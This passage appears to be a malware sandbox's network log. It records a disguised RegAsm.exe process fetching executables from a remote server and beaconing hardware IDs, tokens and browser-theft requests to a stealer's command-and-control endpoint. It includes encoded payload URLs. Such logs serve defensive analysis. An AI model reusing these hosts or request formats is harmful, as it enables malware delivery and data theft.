aHR0cDovLzE0Ny40NS40NC4xMDQvbGRtcy82NmZiZmNjZDgzN2FjX3ZhZGdnZHNhLmV4ZXwwfDB8U3RhcnR8NHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zLzY2ZmJmY2M5OTYzY2FfbGRmc25hLmV4ZXwwfDB8U3RhcnR8NHw=
Oct 2, 2024 09:41:31.906862974 CEST	471	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GCGHCBKFCFBFHIDHDBFC Host: 46.8.231.109 Content-Length: 272 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 36 64 30 65 31 36 61 38 66 65 66 30 63 66 64 34 30 30 36 39 66 37 65 33 64 32 62 35 66 36 30 30 65 31 65 65 39 32 35 34 37 35 37 30 39 65 66 37 34 38 39 38 33 36 35 64 37 37 32 35 30 33 61 62 32 61 62 62 37 37 32 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 6b 6b 6a 71 61 69 61 78 6b 68 62 0d 0a 2d 2d 2d 2d 2d 2d 47 43 47 48 43 42 4b 46 43 46 42 46 48 49 44 48 44 42 46 43 2d 2d 0d 0a Data Ascii: ------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="token"86d0e16a8fef0cfd40069f7e3d2b5f600e1ee925475709ef74898365d772503ab2abb772------GCGHCBKFCFBFHIDHDBFCContent-Disposition: form-data; name="message"wkkjqaiaxkhb------GCGHCBKFCFBFHIDHDBFC--

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49758	147.45.44.104	80	3128	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:41:30.640676975 CEST	93	OUT	GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1 Host: 147.45.44.104 Cache-Control: no-cache
Oct 2, 2024 09:41:31.744663000 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:31 GMT Content-Type: application/octet-stream Content-Length: 391072 Last-Modified: Tue, 01 Oct 2024 13:44:41 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfcc9-5f7a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f @ "`SBx(&` H.text `.rsrcB@@.reloc@BH@ [(<sTw/x~ITT5Q>zbS/2Ew>/dt_so>UVSa5JKYw.#s"-d-7avn\].Lt:2o1!q9_OK^")0.3$5,}3cxz2I}Ie$ .V OGUa$+%\B-U3nc,lffo` bO
Oct 2, 2024 09:41:31.744746923 CEST	1236	IN	Data Raw: 16 63 32 13 dd d1 52 94 12 5d 30 6f 8c 66 c8 d4 eb ac d4 3c d5 39 1e 15 5e 6e 5c fb d2 d4 be ba 0a 5c d0 e3 32 ad 1a 0e 06 3d 1b 6e 6b ee d8 37 20 e6 2c 6f 92 38 ca ac 23 e8 62 f1 06 bc 2a 9e 54 a5 88 67 7d 71 42 b8 5b 00 ee 92 f0 da d3 1d de 7a Data Ascii: c2R]0of<9^n\\2=nk7 ,o8#bTg}qB[zl_63Bu!g<NS_V?i^</V-vG/=OtQpV_,&H"fQ~+pS0Pzm(=/}T$]L7(I"T%{
Oct 2, 2024 09:41:31.744786978 CEST	1236	IN	Data Raw: 51 79 83 92 4f a5 86 9d 0e 9d 8c 6c 26 59 fc 7c 7e 06 9f 9d c9 72 03 ab 71 a8 79 50 30 0e 12 83 b4 bd 2b d4 f0 e5 6a bc 67 66 b5 d8 bb 03 76 3d 8e 28 a4 1c 69 f5 3e c9 3f db 95 c8 2b e0 d7 5d 47 57 f3 d6 ae e9 77 14 4b 7f 7b c1 a2 f3 b2 e1 a0 db Data Ascii: QyOl&Y\|~rqyP0+jgfv=(i>?+]GWwK{ZdS8Co(QXv#cI8?lfbq&=tL<r=VvX7"WS_0TC#s0f0{S\tly(x=8[r0
Oct 2, 2024 09:41:31.744837999 CEST	1236	IN	Data Raw: 54 c0 a7 c5 b4 cf 54 a6 0f da 5a 80 92 0b 34 8f 52 a1 9a fb 79 0a bf 77 e5 c0 96 a1 1d 9d 4c 60 f1 2c 1a 5d fb 2f a8 af d8 f6 04 5b a7 30 9e cd d1 d7 aa 06 38 88 4d 9d 4f 1a 48 ee 99 18 98 f8 28 6f 94 74 7a 07 b7 40 53 52 42 31 59 d9 fb 81 0a 82 Data Ascii: TTZ4RywL`,]/[08MOH(otz@SRB1YDisi\&*N_+kW=Xg}Rk]Rw%y:F{'Gk:Q#1$RY4[(f2:7T~}]q7xlWyy>/u,$vD9&}uG
Oct 2, 2024 09:41:31.744870901 CEST	896	IN	Data Raw: d8 9b c1 e5 ca f7 9c bb b1 14 45 6e 8c f9 5f 32 83 7d 2f 55 7d 6b d9 63 fd 22 aa 01 33 60 a0 0b a9 d6 be 74 ec 70 d5 a0 ba 55 f7 41 69 2f 7a c2 da a2 51 1c fb 9d e3 d2 2b 50 20 84 7b 47 ce 23 ee c5 b2 af dd f6 f5 41 89 ef ff ed 28 5f 51 1f c1 42 Data Ascii: En_2}/U}kc"3`tpUAi/zQ+P {G#A(_QBY)~#y]jdzR39lkyT%lrhVOMDo\|fc9phSHWI^`3%%k,%^klv<=@d5*]>gz<0
Oct 2, 2024 09:41:31.744903088 CEST	1236	IN	Data Raw: 86 6b 5a 98 cc a4 7e f0 ab 85 9d 19 32 62 1e 40 e8 65 4b 45 aa a4 6f b4 32 88 30 8a 20 c1 a6 45 60 31 76 f4 f5 71 47 06 f2 97 a8 37 3b fe 65 c2 8d 86 c1 13 36 00 99 b9 5a 57 62 81 2c a1 8d 21 e1 82 1a ca 79 c7 dc 43 0b 0f 24 a3 bf ab 2d 70 da bf Data Ascii: kZ~2b@eKEo20 E`1vqG7;e6ZWb,!yC$-p{!:j{-d\.g!D[xtYJhoy/z(`}?+5~HmHBk!. \|@Sc8o(9X,oux40r*)xU$9, CV!
Oct 2, 2024 09:41:31.744935036 CEST	1236	IN	Data Raw: 61 60 67 93 c2 96 0c 0f 00 51 16 46 c1 f5 bc e3 4b e8 eb c6 2a 38 71 fc df a7 01 6c 35 26 5f 32 2e e5 bf 96 3c 59 74 d3 21 e2 79 57 9b 67 ed 69 22 c3 a9 6e f5 5d 5e 3e 48 11 51 60 de ed 30 e6 65 e3 6c 9a 97 70 0f 90 b3 e7 24 31 b5 f8 cd c6 cb ba Data Ascii: a`gQFK8ql5&_2.<Yt!yWgi"n]^>HQ`0elp$1AuB"wYud5Z(VZ\QvC7Eqty`P!-"tT_d4MGfl&7`hgXW$gn$4]2v =m@E6YMe
Oct 2, 2024 09:41:31.744986057 CEST	1236	IN	Data Raw: b7 a2 13 dd 32 e6 3a 8f 0d 0a fe 88 05 e5 2f 82 8c 41 69 c5 77 fe 5c 69 97 18 bd 30 69 a4 7a 31 81 89 97 1b 16 59 a6 57 cc 17 34 90 1c 22 ed 31 f5 9c 59 66 ef ee 81 53 0b 2d 04 38 82 43 88 d9 82 f3 bf 58 b9 8b 71 30 04 d7 38 19 1a 8e fa f0 0f d5 Data Ascii: 2:/Aiw\i0iz1YW4"1YfS-8CXq089N+=$`EQ;-kS>O1]cR8.kdKvm"vJ\8ccp6q;>aK(MWx.,?9'_7:2VnnJt88BVI!xT
Oct 2, 2024 09:41:31.745018005 CEST	1236	IN	Data Raw: d9 24 01 55 c5 00 eb e8 e3 14 54 37 64 6a 10 7c a9 c2 19 52 af 61 9f 08 e1 aa 9c 3a 5f 7b 9b 19 11 d1 ea 72 99 9c b4 b0 71 81 8b 61 99 5a 30 6c 51 cd ca 6d a3 10 02 2b 73 db a9 fa a7 c1 6c c1 48 6a e0 7e a2 57 63 ab 75 e0 24 88 26 f8 98 37 0a 91 Data Ascii: $UT7dj\|Ra:_{rqaZ0lQm+slHj~Wcu$&7nsndEq[2zS8G2'9W]utlj?[;kt@VpIo-5xpY03l2W5$,1N_!etHD\2wBFs3 Tx5h6T
Oct 2, 2024 09:41:31.745050907 CEST	1236	IN	Data Raw: e6 f5 08 70 83 8f 9d 41 33 9a ca 55 d5 78 be 17 1a 91 04 26 5f 27 c6 a1 25 ff 8e 7b a2 18 1d a3 91 f2 06 55 f4 46 8d 33 0e e4 4a ae 4b 80 5a e4 cb cd 73 21 9b 56 7b f7 55 e8 c5 c4 51 c8 f3 12 99 80 30 a2 86 bb 6b b1 95 1e d7 36 75 8c 90 f3 86 69 Data Ascii: pA3Ux&_'%{UF3JKZs!V{UQ0k6ui=/UOB\|<;u&[C@CT8HG0D52eNmj(`; e"?'[#yJ.ReifNTU)`:u]!Z1r@0D]xj4sUr
Oct 2, 2024 09:41:31.745084047 CEST	1236	IN	Data Raw: 96 ff 2b 99 a7 7b f0 ca 87 de 09 dd d6 57 a8 dc 42 e2 27 0d 3c 75 4f da e4 fc 68 2c 62 0a 5e a9 fc 88 0b 1f fd 9d 0b ae 45 a9 84 0c d6 bd 52 14 52 6d 62 69 a4 c7 d9 25 16 20 23 59 ff 35 9c 82 bd c2 24 82 59 4d 04 72 5b 20 05 c6 59 74 3f 85 9e b6 Data Ascii: +{WB'<uOh,b^ERRmbi% #Y5$YMr[ Yt?1*9W@98312x<sO\a6hew.pyBtLyo8:uQNq:;8Y%KEYqKfPl{b]@a$"$
Oct 2, 2024 09:41:31.745151997 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:41:31 GMT Content-Type: application/octet-stream Content-Length: 391072 Last-Modified: Tue, 01 Oct 2024 13:44:41 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfcc9-5f7a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f @ "`SBx(&` H.text `.rsrcB@@.reloc@BH@ [(<sTw/x~ITT5Q>zbS/2Ew>/dt_so>UVSa5JKYw.#s"-d-7avn\].Lt:2o1!q9_OK^")0.3$5,}3cxz2I}Ie$ .V OGUa$+%\B-U3nc,lffo` bO

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49799	147.45.44.104	80	5164	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:12.498058081 CEST	191	OUT	GET /ldms/66fbfcc9963ca_ldfsna.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0 Host: 147.45.44.104 Cache-Control: no-cache
Oct 2, 2024 09:42:13.119925022 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 02 Oct 2024 07:42:13 GMT Content-Type: application/octet-stream Content-Length: 391072 Last-Modified: Tue, 01 Oct 2024 13:44:41 GMT Connection: keep-alive Keep-Alive: timeout=120 ETag: "66fbfcc9-5f7a0" X-Content-Type-Options: nosniff Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 20 f8 fb 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 a0 05 00 00 06 00 00 00 00 00 00 ee be 05 00 00 20 00 00 00 c0 05 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 06 00 00 02 00 00 a2 22 06 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 be 05 00 53 00 00 00 00 c0 05 00 42 02 00 00 00 00 00 00 00 00 00 00 78 d1 05 00 28 26 00 00 00 e0 05 00 0c 00 00 00 60 bd 05 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL f @ "`SBx(&` H.text `.rsrcB@@.reloc@BH@ [(<sTw/x~ITT5Q>zbS/2Ew>/dt_so>UVSa5JKYw.#s"-d-7avn\].Lt:2o1!q9_OK^")0.3$5,}3cxz2I}Ie$ .V OGUa$+%\B-U3nc,lffo` bO
Oct 2, 2024 09:42:13.119949102 CEST	1236	IN	Data Raw: 16 63 32 13 dd d1 52 94 12 5d 30 6f 8c 66 c8 d4 eb ac d4 3c d5 39 1e 15 5e 6e 5c fb d2 d4 be ba 0a 5c d0 e3 32 ad 1a 0e 06 3d 1b 6e 6b ee d8 37 20 e6 2c 6f 92 38 ca ac 23 e8 62 f1 06 bc 2a 9e 54 a5 88 67 7d 71 42 b8 5b 00 ee 92 f0 da d3 1d de 7a Data Ascii: c2R]0of<9^n\\2=nk7 ,o8#bTg}qB[zl_63Bu!g<NS_V?i^</V-vG/=OtQpV_,&H"fQ~+pS0Pzm(=/}T$]L7(I"T%{
Oct 2, 2024 09:42:13.119965076 CEST	1236	IN	Data Raw: 51 79 83 92 4f a5 86 9d 0e 9d 8c 6c 26 59 fc 7c 7e 06 9f 9d c9 72 03 ab 71 a8 79 50 30 0e 12 83 b4 bd 2b d4 f0 e5 6a bc 67 66 b5 d8 bb 03 76 3d 8e 28 a4 1c 69 f5 3e c9 3f db 95 c8 2b e0 d7 5d 47 57 f3 d6 ae e9 77 14 4b 7f 7b c1 a2 f3 b2 e1 a0 db Data Ascii: QyOl&Y\|~rqyP0+jgfv=(i>?+]GWwK{ZdS8Co(QXv#cI8?lfbq&=tL<r=VvX7"WS_0TC#s0f0{S\tly(x=8[r0
Oct 2, 2024 09:42:13.120083094 CEST	1236	IN	Data Raw: 54 c0 a7 c5 b4 cf 54 a6 0f da 5a 80 92 0b 34 8f 52 a1 9a fb 79 0a bf 77 e5 c0 96 a1 1d 9d 4c 60 f1 2c 1a 5d fb 2f a8 af d8 f6 04 5b a7 30 9e cd d1 d7 aa 06 38 88 4d 9d 4f 1a 48 ee 99 18 98 f8 28 6f 94 74 7a 07 b7 40 53 52 42 31 59 d9 fb 81 0a 82 Data Ascii: TTZ4RywL`,]/[08MOH(otz@SRB1YDisi\&*N_+kW=Xg}Rk]Rw%y:F{'Gk:Q#1$RY4[(f2:7T~}]q7xlWyy>/u,$vD9&}uG
Oct 2, 2024 09:42:13.120098114 CEST	1236	IN	Data Raw: d8 9b c1 e5 ca f7 9c bb b1 14 45 6e 8c f9 5f 32 83 7d 2f 55 7d 6b d9 63 fd 22 aa 01 33 60 a0 0b a9 d6 be 74 ec 70 d5 a0 ba 55 f7 41 69 2f 7a c2 da a2 51 1c fb 9d e3 d2 2b 50 20 84 7b 47 ce 23 ee c5 b2 af dd f6 f5 41 89 ef ff ed 28 5f 51 1f c1 42 Data Ascii: En_2}/U}kc"3`tpUAi/zQ+P {G#A(_QBY)~#y]jdzR39lkyT%lrhVOMDo\|fc9phSHWI^`3%%k,%^klv<=@d5*]>gz<0
Oct 2, 2024 09:42:13.120112896 CEST	1236	IN	Data Raw: cd d8 e0 03 eb 36 4a f9 ff 1f 71 90 ef 05 ea 41 61 0f c2 fe db c1 45 73 ea b9 e5 70 8f 35 26 8d 56 21 f0 76 86 e0 fe 62 ca 2e a3 0e 63 1b ab 09 8b 15 73 5b b8 a3 78 b1 36 bc 2d af e7 ec d7 b6 01 47 63 5e 59 c2 0a 88 74 f2 04 1e 5b 14 31 ec ed b3 Data Ascii: 6JqAaEsp5&V!vb.cs[x6-Gc^Yt[1Y?fIXf0Y/~n-Lf3A3k?<0nxkS_\|JxLu+V%RnrP+Dc-gp6\q<9L9[X<d8xCq
Oct 2, 2024 09:42:13.120130062 CEST	1236	IN	Data Raw: a8 56 54 26 29 73 90 b8 29 a5 3c ae 7c 13 7d 6a fd 20 ba d9 d3 99 7a 31 4c 3a a3 2a d5 84 6a 78 78 ed a6 c2 07 88 aa 57 01 c2 81 77 de ba e4 2c 8a ef c9 d2 24 d4 75 2b f4 23 d8 55 4e 96 13 c9 f0 33 68 b8 33 ad f0 90 69 07 ec a5 20 9a c8 74 04 76 Data Ascii: VT&)s)<\|}j z1L:*jxxWw,$u+#UN3h3i tv56'KkEW_}Zy+:UTk{{DZ.([0]GeAUP0rX#R./^2q\M2tw7ot}>#@P+jx(1$u\v?
Oct 2, 2024 09:42:13.120400906 CEST	1000	IN	Data Raw: 36 20 2f e8 3e ac 38 8d 34 d8 0c 2f 9c 5e 62 be 76 06 9c d8 8c d5 38 12 6e f3 65 d7 ed 09 9c e7 c2 14 17 00 32 7a 9e e0 30 64 bc d0 7c 05 33 6a c7 53 93 eb d7 87 09 bd f3 54 ac 62 83 f3 f1 ea ea 43 2e 35 77 7c f4 c0 7c 6c 8e da 17 ed c6 60 49 c0 Data Ascii: 6 />84/^bv8ne2z0d\|3jSTbC.5w\|\|l`Iukon58!qW!JrGH;D<El VB/0J$E=IJIeV1$rry8V$vk^zC0Tj_X.eU
Oct 2, 2024 09:42:13.120415926 CEST	1236	IN	Data Raw: a9 09 81 0f 47 b1 32 13 27 39 a3 03 15 e2 98 fa ea 57 cd 5d 08 bd 9e df bf ac 75 fc 74 d5 6c eb 6a 3f 5b 3b 6b db f7 74 40 2a 56 06 95 0e 70 49 b0 b7 6f 10 2d d0 35 78 70 b9 59 30 33 aa 6c 32 b2 57 fc ff 35 18 f0 be f4 24 2c 31 f6 1b ea 83 4e 94 Data Ascii: G2'9W]utlj?[;kt@VpIo-5xpY03l2W5$,1N_!etHD\2wBFs3 Tx5h6T0DE71@S5@<_jCukra0!5X-K:2Q_?\|xdcX/-0{S8tb
Oct 2, 2024 09:42:13.120431900 CEST	1236	IN	Data Raw: 3b 75 be 0b 07 26 04 b5 5b 43 d7 04 40 43 ba 09 9f 54 ba 38 80 48 ad f4 47 80 30 44 12 da af e4 d6 35 32 65 ae 4e 8a a5 bf cd be 6d b1 6a 28 0f ec 60 89 e5 0f 3b 20 65 22 3f e8 c8 a7 0f 0a 07 cf b0 27 a8 de d9 d7 5b cd f8 23 f8 79 4a a0 0e 2e 52 Data Ascii: ;u&[C@CT8HG0D52eNmj(`; e"?'[#yJ.ReifNTU)`:u]!Z1r@0D]xj4sUrs59*ia5no.`EWOrE_n0v(`u8e8iz&OHFGGv
Oct 2, 2024 09:42:13.124978065 CEST	1236	IN	Data Raw: e5 39 1a 38 14 e0 b3 33 b5 31 32 88 e2 78 19 fa c5 ab 3c c1 19 8e 73 b4 d2 e8 4f f2 0f 93 dc 09 93 07 91 5c dd 61 36 88 68 65 ef 77 87 dc 2e 70 79 c6 e5 a6 42 05 74 d2 4c 79 d0 e3 06 bb 8c ad fc c9 9f 6f 0b a3 18 38 3a 75 51 4e 81 a1 83 87 ff 71 Data Ascii: 98312x<sO\a6hew.pyBtLyo8:uQNq:;8Y%KEYqKfPl{b]@a$"$ggi=OG77hder\t9)ZVma<Y2[n1vHC(ZYcA1GOP-Dk \|H

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49809	46.8.231.109	80	6212	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Oct 2, 2024 09:42:21.435482979 CEST	87	OUT	GET / HTTP/1.1 Host: 46.8.231.109 Connection: Keep-Alive Cache-Control: no-cache
Oct 2, 2024 09:42:22.050343037 CEST	203	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 2, 2024 09:42:22.059523106 CEST	413	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AAKJKJDGCGDBGDHIJKJE Host: 46.8.231.109 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 31 41 39 44 34 38 46 41 44 42 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 41 41 4b 4a 4b 4a 44 47 43 47 44 42 47 44 48 49 4a 4b 4a 45 2d 2d 0d 0a Data Ascii: ------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="hwid"1A9D48FADB6D3392259749------AAKJKJDGCGDBGDHIJKJEContent-Disposition: form-data; name="build"default------AAKJKJDGCGDBGDHIJKJE--
Oct 2, 2024 09:42:22.371634007 CEST	407	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4d 7a 55 32 4d 47 4d 34 5a 47 4e 6b 4f 47 55 35 4d 6a 4d 79 59 57 4d 34 4e 57 52 6a 4e 6d 59 33 4e 54 49 35 4d 6a 5a 68 4d 54 4a 69 59 6a 63 33 4d 6a 6c 69 4d 44 4d 31 5a 6a 41 33 59 54 4e 6c 59 57 4d 7a 5a 6d 4e 68 4d 7a 49 31 4f 57 5a 69 59 7a 5a 6b 59 7a 6b 31 5a 44 45 79 59 54 4a 69 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 77 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: MzU2MGM4ZGNkOGU5MjMyYWM4NWRjNmY3NTI5MjZhMTJiYjc3MjliMDM1ZjA3YTNlYWMzZmNhMzI1OWZiYzZkYzk1ZDEyYTJifHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwwfHlibmNiaHlsZXBtZXw=
Oct 2, 2024 09:42:22.407357931 CEST	467	OUT	POST /c4754d4f680ead72.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDHIIDAFIDGCFHJJDGDA Host: 46.8.231.109 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 35 36 30 63 38 64 63 64 38 65 39 32 33 32 61 63 38 35 64 63 36 66 37 35 32 39 32 36 61 31 32 62 62 37 37 32 39 62 30 33 35 66 30 37 61 33 65 61 63 33 66 63 61 33 32 35 39 66 62 63 36 64 63 39 35 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 47 44 48 49 49 44 41 46 49 44 47 43 46 48 4a 4a 44 47 44 41 2d 2d 0d 0a Data Ascii: ------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="token"3560c8dcd8e9232ac85dc6f752926a12bb7729b035f07a3eac3fca3259fbc6dc95d12a2b------GDHIIDAFIDGCFHJJDGDAContent-Disposition: form-data; name="message"browsers------GDHIIDAFIDGCFHJJDGDA--
Oct 2, 2024 09:42:22.597613096 CEST	1236	IN	HTTP/1.1 200 OK Date: Wed, 02 Oct 2024 07:42:22 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 